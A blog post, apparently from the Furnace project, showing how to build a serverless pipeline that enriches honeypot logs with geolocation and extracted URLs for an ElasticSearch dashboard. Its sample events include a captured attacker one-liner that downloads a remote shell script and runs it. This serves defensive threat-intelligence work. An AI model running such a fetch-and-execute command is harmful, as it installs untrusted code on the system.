Threat Intelligence with Honeypots Part 3: Using Furnace to enrich Honeypot data

Dave Mound
Published in Project Furnace
Mar 1, 2019
https://furnace.org

Introduction

Over the past few months, we’ve been working on getting Furnace ready to release as open source. Over the past few weeks, I’ve been thinking about a blog series that would show its capabilities while also having some interesting context behind the data.

So here we are, honeypots and Furnace.

The purpose of this article is to introduce you to Furnace (a platform for rapidly creating streaming data applications), and to show you how it can quickly and easily enable enrichment of data; in this case, gathered from a honeypot. This is just one use case and there are many many more! We encourage you to download it and have a play around to see how it can make your life easier when working with ‘Big Data’.

*Disclaimer* This blog is going to be a little bit of a journey but bear with me … it’ll be worth it :)

TL;DR

$ npm install @project-furnace/furnace-cli -g
$ furnace ignite
$ furnace new honey-stack
$ git clone https://github.com/DeathsPirate/honeypot-furnace
$ cp -R honeypot-furnace/* honey-stack/
$ cd honey-stack
$ git add .
$ git commit -am 'Initial Commit'
$ git push origin master

Connect the Commands and Failed Logins log groups from CloudWatch logs to the tap lambda.

Overview

Enriched Honeypot data dashboard

The idea of this blog series is to show how Furnace lets us rapidly take data from a source and work with it easily. We’ll be taking real-time data from honeypots, enriching it, and creating a dashboard for our output. I guess to start with we need an understanding of what exactly Furnace does.

Furnace is a framework, driven by a supporting application (currently a CLI), that abstracts away the complexities of deploying data streaming applications in the cloud. It essentially creates a data pipeline using message queues and serverless functions. You describe the data flow and write (or use already existing) modules to work on your data, and Furnace handles the deployment.

As a developer I want to have the following experience:

Write code; Run it; It works!

However, if you’ve ever played with any cloud platform you’ll know that isn’t necessarily the case. Generally you’d have to mess around with provisioning infrastructure and services, auth (IAM, etc.), creating message-bus queues, worrying about inputs, etc. etc. That’s not what I want as a developer. Furnace takes away a lot of these headaches. It really does allow me to just focus on writing MY code.

To get more information on Furnace please see the main project site at

https://furnace.org

Pre-requisites

If you’d like to follow along with this article, I’ve written an accompanying post about setting up the honeypot in AWS, along with how to create an initial dashboard for the data. That blog post can be found here:

and the accompanying project on GitHub is here: https://github.com/DeathsPirate/honeypot-furnace

Installing Furnace is super easy. You’ll need to make sure you have the following set up:

  • Node.js and npm (to install the Furnace CLI)
  • An AWS account with credentials configured locally
  • A GitHub account (Furnace uses a git repo and webhook to deploy your code)

With all that in place we just run:

$ npm install @project-furnace/furnace-cli -g
$ furnace ignite

Follow the prompts in the CLI and then wait for your Furnace instance to be spun up in AWS (we are currently working on support for other platforms). It should take around 3 minutes, and then you’ll get a notification in the CLI that it’s complete.

With our instance ready we can bootstrap a new stack, ready to start coding. That’s a simple case of running $ furnace new pick-a-stack-name, where pick-a-stack-name is a name of your choosing!

That will create a directory with the minimal files we’ll need; it will also set up a git repo with a webhook needed to deploy the code for us.

Enrichments

With all the pre-reqs out of the way, it’s time to focus on our enrichments. From our initial records we can definitely extract some meaningful intelligence, and we can also enrich things like the IP address with Geo info so we can make nice pew-pew maps of where the attacks are coming from.

Let’s take a look at an example event and see what we can do …
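For illustration, here’s roughly the shape of an event coming out of the honeypot (a hypothetical example: the containerName and command fields are the ones discussed in this post; the other fields and all of the values are made up):

{
  "containerName": "honeypot_203.0.113.45",
  "user": "root",
  "command": "wget http://198.51.100.7/x.sh; chmod +x x.sh; ./x.sh",
  "timestamp": "2019-02-28T16:09:13Z"
}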

Well, we can split out the IP address from the containerName again, and we can then do our Geo lookup on that IP.

What most attackers will try and do is download more scripts and, as we are capturing those commands, it would be handy to extract those URLs and get some info on those domains/IPs too.
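As a rough idea of what that extraction could look like inside a Python module (the regex, the helper name and the output keys are my own for illustration, not taken from the Furnace or honeypot repos):

import re
from urllib.parse import urlparse

URL_RE = re.compile(r"""https?://[^\s;|&'"]+""")

def extract_callouts(command):
    # Pull any URLs out of a captured shell command and break each one
    # down into its parts (scheme, host, port, path, parameters).
    callouts = []
    for url in URL_RE.findall(command):
        parsed = urlparse(url)
        callouts.append({
            "url": url,
            "scheme": parsed.scheme,
            "host": parsed.hostname,
            "port": parsed.port or (443 if parsed.scheme == "https" else 80),
            "path": parsed.path,
            "params": parsed.query,
        })
    return callouts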

By the end of our pipeline our event will look like below:
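Something along these lines (again hypothetical values; the geo_info and callouts sections match the description that follows, everything else is illustrative):

{
  "src_ip": "203.0.113.45",
  "user": "root",
  "command": "wget http://198.51.100.7/x.sh; chmod +x x.sh; ./x.sh",
  "timestamp": "2019-02-28T16:09:13Z",
  "geo_info": {
    "country": "NL",
    "city": "Amsterdam",
    "location": { "lat": 52.37, "lon": 4.89 }
  },
  "callouts": [
    {
      "url": "http://198.51.100.7/x.sh",
      "scheme": "http",
      "host": "198.51.100.7",
      "port": 80,
      "path": "/x.sh",
      "params": ""
    }
  ]
}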

Geo information will be held in the geo_info section, and any domains found in the commands being run will be extracted into the callouts section. We will break those URLs down further to show scheme, port, parameters etc.

The Furnace Stack

A picture speaks a thousand words so here’s what we will be describing in Furnace:

Furnace Stack Design

The blue boxes are the ones we are interested in as a developer, they are our modules. I’ve combined Python and NodeJS modules in the pipeline to show some of the flexibility of Furnace.

This is all we describe from a code point of view. I don’t care how the data gets to my functions; I do care that the data gets there, and in the order I specified.

Let’s take a look at the stack.yaml file to see what was generated (if you selected the starter-template when running furnace new {your-stack-name}):
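It will be something along these lines (a sketch reconstructed from the description below; the exact key names in your generated file may differ, and the state repo URL is a placeholder):

name: honey-stack
platform:
  type: aws
defaults:
  batchSize: 10
state:
  repo: https://github.com/your-user/honey-stack-state
environments:
  - dev
  - staging
  - prod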

We can see the name of our stack (or project); the platform we are targeting (AWS); a default batch size for our messaging (10); the URL for our state repository in GitHub; and finally three environments. Let’s talk about those quickly in the next section.

Environments

With the starter-template, the stack.yaml file describes three environments:

  • Development
  • Staging
  • Production

When we first commit and push our code to GitHub it will be on a development branch. If we want to promote that deployment to the next environment we simply run furnace promote {environment}, e.g. furnace promote staging. This will handle redeploying the code on a new branch, and we’ll end up with an entirely separate environment deployed in the cloud.

Ok, let’s move across the stack now.

Source

Our source in this project is CloudWatch logs. We’ll describe that in the sources.yaml file, let’s take a look at the one from the project:
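Roughly like this (the source name and the exact type string are assumptions based on the description below):

sources:
  - name: honeylogs
    type: KinesisStream
    shards: 1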

We give our source a name and its type (Kinesis Stream in this case) and a few other params, like how many shards we need.

Tap

The tap is our module for doing the initial processing of the data. It’s used to parse and normalise. We have JSON data coming in, so we don’t really need to do much processing here, but we will use this module to extract the IP from the containerName field and change the key name for command so we can distinguish between the commands captured by stdin and spyusers. The yaml for our tap looks like this:
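Something like this (a sketch: the tap name honeylogs-tap is the one referenced later in the pipes and the deployed Lambda; the source name must match sources.yaml and is assumed here):

taps:
  - name: honeylogs-tap
    source: honeylogs
    module: honeytap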

So basically we name our tap, specify the source, and say which module we want to load to fulfill this ‘tap’ role (honeytap). If we look at the modules folder we can see the honeytap folder, which contains our honeytap module.

Contents of our modules folder

Modules

Now is probably a good time to discuss the modules. As I said before, this is where, as developers, we will be focusing most of our effort. The stack’s yaml files describe how our data should flow, but our modules are where we actually write code to act on that data. Presently Furnace supports both NodeJS and Python 3.6 (more language support is on the way!). Each module has its own folder in the main modules folder, and we can use different languages for each module; in my case I have a NodeJS module for doing the Geo lookups, and the honeytap and passthru modules are both Python. Let’s take a further look inside a module folder:

Module folder structure

At the root of the module we have two yaml files: module.yaml describes what language the module is written in and some other meta surrounding it, and config.yaml is where we can place testing and environment variables to pull through into our environment.

We also have a src folder, and this is where we write our actual code. You can see in the example there is a furnace.py file. This is the entry point file that Furnace will use for the function. All Python modules should follow this structure. The file itself, at a minimum, would look like this:
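A minimal sketch, assuming the entry point is a single function that takes one event and returns it (the function name handler is an assumption — use whatever signature the Python template in the repo defines):

# furnace.py - minimal module entry point (sketch)
def handler(event):
    # `event` is a single parsed message handed to us by Furnace.
    # Do your processing here, then return the (possibly modified)
    # event so it can be sent on down the pipeline.
    return event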

Furnace will wrap this function with the code necessary to retrieve the messages off the queue, unpack and process them if required, and then send each event to our function. This means I don’t have to think about that side of it; I can focus on what to do with my event and return it, and Furnace will package it all up and send it down the line to wherever it needs to go. Pretty cool, huh!

Don’t worry about remembering all of the above. We’ve provided templates for both NodeJS and Python and they are available from the following repo:

You can download the template then go from there.

OK cool, we’ve got data to our tap. It’s normalised, parsed, and ready to go into the pipeline. First let’s describe the pipeline, then plug it up to our tap with a pipe.

Pipelines

Pipelines are a collection of modules that our data will flow through. The pipelines.yaml for our project looks like so:
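Roughly like this (the pipeline name enrichment is the one referenced by the pipes later; the module names and key layout are assumptions based on the stack design above):

pipelines:
  - name: enrichment
    modules:
      - geoip      # NodeJS Geo lookup module (name assumed)
      - passthru   # Python module from the project repo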

Pretty simple: we give our pipeline a name, then list the modules we want to pass the data through, in order.

So that was easy, let’s plug this pipeline up to our tap.

Pipes

Pipes are Furnace’s connectors. Let’s look at the pipes.yaml file:
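In spirit it looks like this (the key names are a sketch; the two connections themselves are the ones described below):

pipes:
  - source: honeylogs-tap
    destination: enrichment
  - source: enrichment
    destination: es-sink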

Again pretty straightforward: we tell Furnace that we want to connect the honeylogs-tap to the enrichment pipeline, then we connect the enrichment pipeline to the es-sink (our ElasticSearch instance). Let’s look at the sink now; it’s the last piece of our puzzle, so if you’ve come this far I’m glad I haven’t bored you yet :)

Sinks

Sinks are where we send data when it comes out of Furnace; in our case we are using ElasticSearch. Let’s look at the sinks.yaml file next:
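Something along these lines (the resource, index and type names are assumptions; the shape follows the description below):

sinks:
  - name: es-sink
    resource: honeypot-es
    index: honeypot
    type: doc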

Fairly self-explanatory. The important bit here is the resource: we define that in our resources.yaml file, so Furnace will spin up ElasticSearch for us and then tie the es-sink firehose to it. We’ve also described what we want to call our ES index and the type name we want for our docs.

Resources

The resources.yaml file describes things we need outside of our dataflow. We will be storing our honeypot data in ElasticSearch, so we can use Furnace to create that for us (if we already had an ElasticSearch instance we could just point the sink to our ES domain instead).
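A minimal sketch of what that file might contain (the resource name and the exact type string are assumptions):

resources:
  - name: honeypot-es
    type: elasticsearch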

And that’s it as far as ‘Furnace workings’ goes.

Deployment

Once we’ve written our modules and described our dataflow in the yaml files, we can push to GitHub. This will automatically kick off a deployment, and we can check the status by running furnace status:

user@somewhere:~/furnace-project$ furnace status
environment dev
timestamp 2019-02-28T16:09:13Z ref master sha 8ec347f2
success
environment staging
environment prod

When our deployment finishes the status will show success, and we can finish the last bit by sending the honeypot logs from AWS into our new Furnace stack.

Connecting Logs to Lambda

From the CloudWatch Logs page in the AWS console, select the Commands log group radio button, then select the Actions dropdown -> Stream to AWS Lambda.

Streaming Log Groups to Lambda

Select the tap Lambda (it should end in honeylogs-tap-dev), then click Next, select JSON for the format, then Next, Next, Start Streaming.
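If you’d rather script this than click through the console, the rough CLI equivalent is to grant CloudWatch Logs permission to invoke the Lambda and then create a subscription filter (the function name, region, account ID and log group ARN below are placeholders):

aws lambda add-permission \
  --function-name honey-stack-honeylogs-tap-dev \
  --statement-id cloudwatch-logs-invoke \
  --principal logs.amazonaws.com \
  --action lambda:InvokeFunction \
  --source-arn "arn:aws:logs:eu-west-1:123456789012:log-group:Commands:*"

aws logs put-subscription-filter \
  --log-group-name Commands \
  --filter-name honeylogs-tap \
  --filter-pattern "" \
  --destination-arn arn:aws:lambda:eu-west-1:123456789012:function:honey-stack-honeylogs-tap-dev

(Repeat for the Failed Logins log group.)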

If all went well the log messages will now be flowing through the pipeline and into ES.

Conclusion

With data in ElasticSearch we can now create a nice dashboard for our enriched data. We’ve gone from the dashboard in CloudWatch, which looked like this:

CloudWatch Dashboard

To a much more enriched dashboard

Furnace data enriched dashboard

Without too much effort. And we can keep expanding our enrichments! How about taking those staging domains, downloading the files in another module, doing some forensics on them, and then outputting that data too? Lots of ways to go, but that’s enough from me for this blog I think :)

Thanks for reading, hopefully I’ve shown you that ‘Big Data’ doesn’t have to be scary!
